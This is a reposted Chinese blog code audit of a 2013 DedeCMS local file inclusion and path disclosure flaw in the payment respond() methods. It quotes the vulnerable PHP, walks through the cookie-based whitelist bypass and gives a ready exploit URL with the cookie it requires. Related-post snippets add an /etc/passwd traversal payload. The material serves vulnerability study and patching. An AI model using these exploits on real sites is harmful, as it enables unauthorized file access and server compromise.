java代码审计文件包含_代码审计:dedecms本地文件包含及物理路径泄露0day[转]

最新推荐文章于 2024-04-07 16:20:44 发布
最新推荐文章于 2024-04-07 16:20:44 发布
阅读量195 收藏
点赞数
文章标签: java代码审计文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35132022/article/details/114958918
版权

晚餐吃撑了,瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多,赶紧下了套,用editplus搜索了几个关键字,果然发现些问题。(话说平时写代码也喜欢用editplus,小巧方便多年习惯)

出现漏洞的两个文件为:

Include/payment/alipay.php

Include/payment/yeepay.php

漏洞均出现在respond方法里,估计这两个文件是临时工写的。

Include/payment/alipay.php

[task]......

function respond()

{

if (!empty($_POST))

{

foreach($_POST as $key => $data)

{

$_GET[$key] = $data;

}

}

/* 引入配置文件 */

require_once DEDEDATA.'/payment/'.$_GET['code'].'.php';

...... [/task]

大概在133行左右,$_GET[‘code’]没有经过任何判断和过滤。

Include/payment/yeepay.php

[task]......

function respond()

{

/* 引入配置文件 */

require_once DEDEDATA.'/payment/'.$_REQUEST['code'].'.php';

$p1_MerId = trim($payment['yp_account']);

$merchantKey = trim($payment['yp_key']);

...... [/task]

大概在145行左右,$_REQUEST['code']没有经过任何判断和过滤。

这两个方法在plus/carbuyaction.php文件调用。

plus/carbuyaction.php

[task]......

} else if ($dopost == 'return') {

$write_list = array('alipay', 'bank', 'cod', 'yeepay');

if (in_array($code, $write_list))

{

require_once DEDEINC.'/payment/'.$code.'.php';

$pay = new $code;

$msg=$pay->respond();

ShowMsg($msg, "javascript:;", 0, 3000);

exit();

} else {

exit('Error:File Type Can\'t Recognized!');

}

}

...... [/task]

大概在334行,当$dopost等于return的时候就开始进入过程了。熟悉dedecms朋友都知道在include/common.inc.php使用了一种类似register_globals的机制。

所以$_GET['code']或$_REQUEST['code']会变成$code,而$code是经过判断的,值必须在$write_list数组以内这样才能继续后面的流程调用respond方法触发漏洞。这样的话貌似就无法控制$_GET['code']为任意值了。

回到include/common.inc.php来看看他的机制。

[task]......

foreach(Array('_GET','_POST','_COOKIE') as $_request)

{

foreach($$_request as $_k => $_v)

{

if($_k == 'nvarname') ${$_k} = $_v;

else ${$_k} = _RunMagicQuotes($_v);

}

}

...... [/task]

大概在79行,可以看到他是从$_GET,$_POST,$_COOKIE这三个全局变量里取值的。嘿嘿,细心点就发现了吧。从他这个优先机制来讲他是先从get再从post再从cookie也就是说最终$code会是以$_COOKIE[‘code’]的值为准,而我们要控制的是$_GET[‘code’]或$_REQUEST['code']只须要$code的值在$write_list数组以内就行了。Exp:http://www.php0day.com/plus/carbuyaction.php?dopost=return&code=../../tags上面的Exp是包含根目录下的tags.php文件包含其他后缀请自行构造截断,使用exp测试时须要自己添加一个code等于alipay或yeepay的cookie。暴路径:

由于bank和cod这两个文件并没有respond方法,所以如果code等于bank或者cod时将会暴错泄露路径。注:请勿非法测试,产生后果与本人无关。

作者:b4dboy

漏洞发现日期:2013-3-27

转自:http://www.cnseay.com/2515/

小可爱1号嘻嘻
关注
代码审计(PHP)-代码执行漏洞-DedeCMS V5.7 UTF8 SP2
iHuangZuGuang的博客
01-24 721
代码审计-代码执行漏洞-DedeCMS V5.7 UTF8 SP2 漏洞代码位于tpl.php251行-281行 此处定义savetagfile()函数:判断参数"action"是否等于savetagfile,若等于,进行下一步。 csrf_chack():csrf检验函数,需要加上token来进行绕过。token是登陆令牌,向服务器发送登录请求时,客户端会生成一个用于验证的令牌。 function csrf_check() { global $token; if(!isset($token
Java代码审计文件包含
jameson_的专栏
06-12 2422
事件今天报一个文件包含,正常url:http://xx.xx.xx.com/view=f01 payload : http://xx.xx.xx.com/view=../../../../../../../../etc/passwd%00看了一下,问题代码如下。private String getFile(String tagId) { String path = getClass
DedeCms 5.x 本地文件包含漏洞(respond方法)
weixin_33795743的博客
03-21 262
漏洞版本: DedeCms 5.x 漏洞描述: DedeCms是免费的PHP网站内容管理系统。 plus/carbuyaction.php里没有对变量进行严格的过滤 出现漏洞的两个文件为: Include/payment/alipay.php Include/payment/yeepay.php 漏洞均出现在respond方法里 Include/payme...
网站安全检测、漏洞检测、dedecms本地文件包含
z . s . j
05-06 2639
可以在“站长工具”或“360网站安全检测”进行网站安全检测 以下是个人遇到的网站安全检测问题: 这是修改后的检测返回的信息 之前是存在高危漏洞1个页面 【高危】dedecms本地文件包含 找到Include/payment/alipay.php        Include/payment/yeepay.php 从下载补丁的地址下载,按照你安装
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
动易数据DedeCms2007_petodede_CMS程序开发模板(使用说明+源代码+html).zip
04-21
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
基于CMS实现的动易数据DedeCms2007_petodede(使用说明+源代码+html).zip
最新发布
04-21
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
java代码审计文件包含_代码审计--一道简单的文件包含题目的多种利用方式
weixin_28689507的博客
03-02 585
不知出自哪次CTF前言:本萌新最近在学习代码审计,有一天在水群聊到代码审计如何学习,然后某dalao丢给我一道题,说你对这题有什么看法,本萌新一看,这不是很简单吗,想也没多想就直接上去?file=flag.php,然后被dalao指教了一番,于是就有了这篇文章。目录:NO.1 传统方法首先来看下代码error_reporting(0);if(@isset($_GET["file"])){inclu...
CVE-2023-2928 DedeCMS 文件包含漏洞getshell 漏洞分析
shelter1234567的博客
04-07 1126
这样的话一般的利用方式就不行了,好在cms没用禁用掉文件包含的逻辑,我们可以利用/admin/allowurl.txt 这个文件,实现文件包含任意代码执行。可以将用户输入的字符保存到/admin/allowurl.txt ,因为有stripslashes函数的过滤xss无效。file_manage_control.php 页面为用户提供了网站文件管理的功能,访问file_manage_control.php 利用文件包含构造1.php。尝试在php中或txt中添加php执行代码结果被检测了。
JAVA代码审计常用漏洞总结
12-11
主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯: 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑 可以是一个函数,或者是条小小的条件判断语句。 敏感函数参数回溯,根据敏感函数,逆向追踪参数传递的过程。这个方法是最高效,最常用 的方法。大多数漏洞的产生是因为函数的使用不当导致的,只要找到这些函数,就能够快速挖掘想要的漏洞。
Java代码审计-系统信息泄露 jsp中使用html注释
dilamo1968的博客
08-22 322
低危 系统中存在大量JSP页面当中注释采用HTML注释,而不是JSP注释的情况。 此情况下,攻击者在浏览器浏览页面的时候,右键查看页面源代码,可以看到HTML注释内的信息,很多时候甚至是代码块,导致系统信息泄露。 Jsp html 注释区别: (1)HTML页面注释-----这里面的注释会被编译(加载页面时,会进行语法判断,取需要的变量默认值) <!--...
DedeCMS5.7远程文件包含漏洞分析
shelter1234567的博客
09-13 376
访问第二个payload,由于../data/admin/config_update.php为空 $updateHost失去了定义,可以被变量覆盖到, $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";利用 $install_demo_name可控的方式将config_update.php 写入空 让其中的$updateHost失去定义, 写入空执行找不到对应的文件为空, $sql_content 自然就为空。如果业务还有以下代码。
代码审计】敏感信息泄露
TeamsSix 的 CSDN 空间
12-15 3031
这里以 TurboMail 5.2.0 里的敏感信息泄露漏洞作为学习。 已知 TurboMail 5.2.0 的敏感信息泄露路径为 /mailmain?type=pm 打开 TurboMail 的安装目录,在 turbomail\web\webapps\ROOT\WEB-INF 下找到 web.xml 文件,发现以下配置信息 <servlet-mapping> <servlet-name>mailmaini</servlet-name> <url-patte
代码审计XSS 0day
zhangge3663的博客
02-18 185
个人技术能力问题,先从xss挖! 步骤一:使用rips进行自动化审计 感觉这个好搞 步骤二:使用vscode看 Rips提示57行有洞 复制出来看: echo '<div id="douFrame"><div class="bg" onclick="douRemove('."'douFrame'".')"></div><div class="frame details"><h2><a href="javascript:v
从0学代码审计——DedeCMS-5.5.7-sp2
zkaqlaoniao的博客
12-22 302
继续审计和复现框架漏洞了,DedeCMS框架在我之前打鹏城杯的时候遇到过,于是找了个比较老的版本,审计一下漏洞,也算是熟悉一下该CMS的基本结构。一旦登录到了后台,就可以对源码进行修改了,所以说后台的审计的漏洞真的算漏洞吗?可能开发者就是要对后台管理员设置这么大的权限。所以后台涉及到的相关漏洞就不再分析了。
【安全】P 2-22 SQL注入漏洞简单挖掘 - 代码审计挖掘0day
Z_David_Z的博客
02-15 358
目录0X01 CMS环境搭建(espcms)0X02 自动化审计工具0X03 直接挖掘select注入0X04 漏洞验证POC 0X01 CMS环境搭建(espcms) 完成搭建 下载地址:(已上传,稍后补充) 0X02 自动化审计工具 作者网站现在已经无法访问:http://www.cnseay.com/ 下载地之一 [下载地址二]() 点击“新建项目”,打开espcms目录,再点:自动审计->开始 0X03 直接挖掘select注入 已这条漏洞提示为例 双击达到位置 par
DedeCMS(CVE-2019-8933)
m0_74559567的博客
03-15 901
密码就是在字典里面,但是我们发现并没有爆破成功,原因是请求过快,输入错误的时候网页会跳错误页面然后再返回再次登录。查看源代码,找到验证码的url,当然也可以右键打开验证码链接,或者直接拖就可以。然后再次开始攻击,攻击完成后,排序长度,不一样的基本是成功的。返回Bp插件界面,然后右键导入模板,填入接口url。payload1的位置,添加常用的密码字典进行爆破。点击浏览,是可以被成功解析的,使用蚁剑进行连接。payload2位置,选择的是验证码的插件。抓包验证码的网页后,右键发送到插件。
java sql注入包_java代码审计之SQL注入
weixin_33508272的博客
02-24 301
前言在java中,操作SQL的主要有以下几种方式:•java.sql.Statement•java.sql.PrepareStatment•使用第三方ORM框架,MyBatis或者Hibernatejava.sql.Statementjava.sql.statement是最原始的执行SQL的接口,使用它需要手动拼接SQL语句。String sql = "SELECT * FROM user WHE...
dedecms的文件上传路径有哪些
05-16
DedeCMS 的文件上传路径主要有以下几个: 1. `/uploads/`: 这是默认的上传路径,存储所有上传的文件,包括图片、附件等。 2. `/uploads/plus/`: 这是附件上传路径,用于存储用户上传的附件文件。 3. `/uploads/diy/`: 这是 DIY 模板上传路径,用于存储用户自定义的模板文件。 4. `/uploads/member/`: 这是会员上传路径,用于存储会员上传的头像等文件。 5. `/uploads/soft/`: 这是软件上传路径,用于存储用户上传的软件文件。 需要注意的是,为了避免文件上传路径泄露,建议对文件上传路径进行修改。您可以通过修改 `include/common.inc.php` 文件中的 `$cfg_upload_dir` 变量来修改默认的上传路径
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值